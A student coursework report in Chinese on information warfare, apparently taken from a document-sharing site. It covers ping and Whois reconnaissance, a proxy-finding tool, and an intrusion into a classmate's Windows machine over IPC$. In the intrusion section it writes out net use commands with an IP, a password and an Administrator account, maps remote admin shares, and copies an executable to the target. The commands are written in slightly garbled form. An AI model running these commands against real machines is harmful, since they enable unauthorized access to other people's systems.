信息对抗大作业Word文档格式.docx
《信息对抗大作业Word文档格式.docx》由会员分享,可在线阅读,更多相关《信息对抗大作业Word文档格式.docx(12页珍藏版)》请在冰豆网上搜索。
![信息对抗大作业Word文档格式.docx](https://file1.bdocx.com/fileroot1/2023-1/23/a703c1fc-2bf2-4e51-88b1-1cad4071a22a/a703c1fc-2bf2-4e51-88b1-1cad4071a22a1.gif)
进入九十年代后,Internet走向了全世界。
于是,网络攻击成为了热点。
于是出现了黑客、红客、病毒等一系列新兴名词与产业。
计算机网络战是在计算机网络空间内进行的对抗,这种对抗形式是通过计算机通信网,特别是当前因特网,截取、利用、篡改、破坏对方的信息,利用假冒信息或病毒来危害对方的信息与信息设施,并同时保护己方的信息以信息基础,已达到预期目的的行动。
其包括:
网络攻击、网络防护和网络支援。
(一)、身份攻击
1、利用ping命令获取网站的的ip地址(以pingXX为例)
得到XX的ip地址为61.135.169.125
由于大的网站一般有多个web服务器,以避免一台服务器出现问题后网站不能正确运行的情况,二每台服务器的ip都不同,所以每次ping的结果并不一定相同。
示例:
2、利用Whois来搜索关于此ip的信息
(1)、关于Whois
Whois简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期等)。
通过域名Whois查询,可以查询域名归属者联系方式,以及注册和到期时间,可以等进行访问!
(2)、关于域名到期删除规则实施的解释:
国际域名:
到期当天暂停解析,如果在72小时未续费,则修改域名DNS指向广告页面(停放)。
38天内,可以自动续费。
续费后,系统自动恢复原来的DNS,刷新时间大概是24-48小时。
39-70天,域名处于赎回期(Redemption),此期间域名无法管理,需手工赎回!
75天,域名被彻底删除,可以重新注册。
国内域名:
到期当天暂停解析,如果在72小时未续费,则修改域名DNS指向广告页面(停放)。
35天内,可以自动续费。
过期后36-48天,将进入13天的高价赎回期,此期间域名无法管理。
过期后48天后仍未续费的,域名将随时被删除。
(3)Whois查询:
(二)、身份攻击
1、软件名称:
ProxyHunter
软件介绍:
代理服务器猎手,可以很快速的查找网络上的免费Proxy哦!
主要有以下特点:
支持多网址段、多端口自动查询,支持自动验证并给出速度评价,支持后续的再验证,支持用户设置连接超时和验证超时,支持用户设置验证内容,支持进度时间预测,支持用户设置最大连接数(可以作到不影响其他网络程序),支持自动查找最新版本,最大的特点是搜索速度快,最快可以在十几分钟内搜完整个B类地址的65536个地址。
同时代理服务器软件还可以隐藏自己的真实地址信息,可隐藏自己的IP,防止被黑客攻击。
但是由于校园网不需用代理服务器,用了之后校园网自己断了,所以这个计划破产了。
(三)、利用IPC$漏洞为基础的入侵攻击。
实验过程
一、获取对方主机账号与口令
所谓口令入侵是指使用某些合法用户的帐号和口令登录到目的主机,然后再实施攻击活动。
这种方法的前提是必须先得到该主机上的某个合法用户的帐号,然后再进行合法用户口令的破译。
获得普通用户帐号的方法非常多,如:
1、利用目标主机的Finger功能:
当用Finger命令查询时,主机系统会将保存的用户资料(如用户名、登录时间等)显示在终端或计算机上;
2、利用目标主机的X.500服务:
有些主机没有关闭X.500的目录查询服务,也给攻击者提供了获得信息的一条简易途径;
3、从电子邮件地址中收集:
有些用户电子邮件地址常会透露其在目标主机上的帐号;
4、查看主机是否有习惯性的帐号:
有经验的用户都知道,非常多系统会使用一些习惯性的帐号,造成帐号的泄露。
由于本人的目标主机是同学的机子,所以没有使用这些有破坏性的方法,而是直接得到口令。
二、进行IPC$连接
在dos环境下,使用如下的命令:
netuse\\ip\ipc$"
口令"
/u:
"
用户名"
此次使用的命令是
netuse\\222.25.163.94\ipc$"
8110502123"
/use:
"
Administrator"
运行结果如下图:
三、操作对方主机
IPC$连接完成后就可以使用其他的命令来操作远程主机,如查看系统时间、NETBIOS用户列表等。
1、查看对方主机的当前系统时间
使用命令:
nettime\\IP
指令及运行结果如下:
2、查看远程主机的共享资源
使用命令:
netview\\IP
指令及运行结果如下:
3、得到远程主机的NetBIOS用户名列表
使用命令;
nbtstat-aIP
4、映射远程共享:
netusez:
\\IP\盘符$
此命令将共享名为baby的共享资源映射到z盘
使用命令及运行结果如下:
将同学的c盘映射到我的主机里
打开同学的c盘
由于是同学的电脑,就没做什么破坏,放过他吧。
5、删除共享映射
使用命令:
netusec:
/del删除映射的c盘,其他盘类推
netuse*/del/y删除全部
也可以之间点断开
断开之后
6、删除一条已建立的IPC$连接
netuse\\IP\ipc$/del
四、还可以利用IPC$做别的事情
常用到的命令如下:
1、查看远程主机的共享资源(但看不到默认共享)
netview\\IP
2、建立空连接:
netuse\\IP\ipc$"
/user:
3、查看本地主机的共享资源(可以看到本地的默认共享)
netshare
4、显示本地主机当前服务
netstart
5、启动/关闭本地服务
netstart服务名/y
netstop服务名/y
6、向远程主机复制文件
copy\路径\srv.exe\\IP\共享目录名,如:
copyccbirds.exe\\*.*.*.*\c即将当前目录下的文件复制到对方c盘内